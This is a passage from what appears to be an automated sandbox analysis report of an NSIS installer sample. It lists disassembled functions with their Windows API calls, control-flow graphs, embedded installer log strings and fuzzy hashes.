                                        • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                        • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                        • CoUninitialize.COMBASE(?), ref: 00403AFD
                                        • ExitProcess.KERNEL32 ref: 00403B1D
                                        • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                        • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                        • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                        • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                        • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                        • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                        • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                        • API String ID: 2435955865-3712954417
                                        • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                        • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                        • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                        • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 790 406301-406315 FindFirstFileW 791 406322 790->791 792 406317-406320 FindClose 790->792 793 406324-406325 791->793 792->793
                                        APIs
                                        • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                        • FindClose.KERNEL32(00000000), ref: 00406318
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID: jF
                                        • API String ID: 2295610775-3349280890
                                        • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                        • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                        • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                        • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 794 406328-40633e GetModuleHandleA 795 406340-406349 LoadLibraryA 794->795 796 40634b-406353 GetProcAddress 794->796 795->796 797 406359-40635b 795->797 796->797
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                        • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: AddressHandleLibraryLoadModuleProc
                                        • String ID:
                                        • API String ID: 310444273-0
                                        • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                        • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                        • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                        • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                        APIs
                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                        • ShowWindow.USER32(?), ref: 00401753
                                        • ShowWindow.USER32(?), ref: 00401767
                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                        • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                        • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                        Strings
                                        • Call: %d, xrefs: 0040165A
                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                        • detailprint: %s, xrefs: 00401679
                                        • Jump: %d, xrefs: 00401602
                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                        • Aborting: "%s", xrefs: 0040161D
                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                        • Rename failed: %s, xrefs: 0040194B
                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                        • BringToFront, xrefs: 004016BD
                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                        • Rename: %s, xrefs: 004018F8
                                        • SetFileAttributes failed., xrefs: 004017A1
                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                        • Sleep(%d), xrefs: 0040169D
                                        • Rename on reboot: %s, xrefs: 00401943
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                        • API String ID: 2872004960-3619442763
                                        • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                        • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                        • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                        • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                        • ShowWindow.USER32(?), ref: 004054FE
                                        • DestroyWindow.USER32 ref: 00405512
                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                        • GetDlgItem.USER32(?,?), ref: 0040554F
                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                        • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                        • GetDlgItem.USER32(?,00000001), ref: 00405619
                                        • GetDlgItem.USER32(?,00000002), ref: 00405623
                                        • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                        • GetDlgItem.USER32(?,00000003), ref: 00405734
                                        • ShowWindow.USER32(00000000,?), ref: 00405756
                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                        • EnableWindow.USER32(?,?), ref: 00405783
                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                        • EnableMenuItem.USER32(00000000), ref: 004057A0
                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                        • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                        • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                        • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                        • String ID:
                                        • API String ID: 3282139019-0
                                        • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                        • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                        • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                        • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                        APIs
                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                        • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                        • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                        • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                        • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                        • RegisterClassW.USER32(00476A40), ref: 00405B36
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                          • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                        • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                        • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                        • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                        • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                        • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                        • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                        • API String ID: 608394941-2746725676
                                        • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                        • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                        • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                        • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        • lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
                                        • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0
                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426979,759223A0,00000000), ref: 00404FD6
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426979,759223A0,00000000), ref: 00404FE6
                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426979,759223A0,00000000), ref: 00404FF9
                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2036889192.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2036859730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036912745.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2036935835.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2037059509.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                        • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                                        • API String ID: 4286501637-2478300759
                                        • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                        • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                        • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                        • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
